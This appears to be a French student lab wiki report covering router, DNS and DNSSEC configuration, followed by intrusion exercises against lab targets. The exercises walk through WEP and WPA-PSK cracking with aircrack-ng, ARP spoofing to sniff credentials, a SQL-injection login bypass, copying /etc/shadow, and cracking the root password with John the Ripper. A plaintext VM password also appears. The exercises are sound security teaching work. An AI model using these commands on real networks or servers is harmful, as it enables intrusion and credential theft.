 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
	     allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53847</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53847"/>
				<updated>2020-11-16T22:49:24Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
